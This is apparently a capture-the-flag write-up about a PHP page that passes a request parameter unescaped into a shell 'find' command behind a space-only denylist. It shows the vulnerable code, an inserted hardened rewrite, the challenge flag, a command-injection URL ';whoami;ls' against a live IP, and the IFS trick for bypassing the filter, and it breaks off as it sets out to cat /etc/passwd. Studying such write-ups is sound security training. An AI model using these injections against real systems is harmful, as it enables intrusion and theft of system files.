Challenge Description

I think my blacklist is going to prevent any vulnerability!

Flag format: CTF{sha256}

Flag proof

CTF{3b2ceb0403300535fcd4808e8cbdb3cc3bd8f8b674527adce2915467f182faa4}

Summary

Use the IFS=] trick to bypass the space filter, then cat the secrets.php file; the flag appears in the page's source code.

Details

After visiting the website, we get the following PHP code:

<?php
require __DIR__ . '/secrets.php';
if (!isset($_GET['start'])){
    show_source(__FILE__);
    exit;
}

// Denylist: a single space character anywhere in the value aborts the request.
$value = $_GET['secrets'];
if (strpos($value, ' ') !== false) {
  exit;
}

// The unescaped value is appended straight to the shell command line.
$cmd = "/usr/bin/find . ".$value;
echo shell_exec($cmd);

?>
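As an added illustration that is not part of the challenge or this write-up, the same endpoint rewritten so that the command line can no longer be extended by the request. The function names valid_pattern and build_find_command, and the decision to restrict find to a -maxdepth 1 -name search, are assumptions about what the endpoint is meant to do:

```php
<?php
// Added hardening example, not the challenge's code. Two changes relative to
// the vulnerable page: (1) the input is validated against an allow-list instead
// of a one-character denylist, and (2) the only shell argument is wrapped with
// escapeshellarg(), so the value can never become a new command.

require __DIR__ . '/secrets.php';

if (!isset($_GET['start'])) {
    show_source(__FILE__);
    exit;
}

/**
 * Accept only a plain file-name glob: letters, digits, dot, dash, underscore
 * and '*'. Everything the shell cares about (';', '|', '$', '`', quotes,
 * whitespace, newlines, braces) is rejected here, before any command string
 * exists. A denylist of single characters cannot do this: $IFS, tabs and
 * brace expansion all stand in for a space.
 */
function valid_pattern(string $p): bool
{
    return preg_match('/^[A-Za-z0-9_.*-]{1,64}$/', $p) === 1;
}

/**
 * Build the find command with the pattern as one single-quoted argument.
 * escapeshellarg() quotes the value and escapes embedded single quotes, so
 * even a pattern that slipped past the allow-list stays a single argument.
 */
function build_find_command(string $pattern): string
{
    return '/usr/bin/find . -maxdepth 1 -name ' . escapeshellarg($pattern);
}

// $_GET['secrets'] may be absent or an array (secrets[]=x); both are rejected.
$value = $_GET['secrets'] ?? '';
if (!is_string($value) || !valid_pattern($value)) {
    http_response_code(400);
    exit('invalid pattern');
}

$output = shell_exec(build_find_command($value));

// Serve the listing as plain text so file names cannot inject markup.
header('Content-Type: text/plain; charset=utf-8');
echo $output ?? '';
?>
```

The allow-list is the primary control; escapeshellarg() is defence in depth for the case where the pattern check is later loosened. If find's own output is all the page needs, dropping the shell entirely in favour of glob() removes the command-injection surface outright.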

Findings:

https://bugs.php.net/bug.php?id=76671

http://35.246.158.241:32219/?start=1&secrets=;whoami;ls

After running the 'ls' command, we notice that we have a secrets.php file.

The webserver runs: /usr/bin/find . <secrets-value>

We have secrets.php in the current directory, which probably contains the flag.

We use the IFS=] trick to bypass the server's check that rejects any space character. We try to cat /etc/passwd: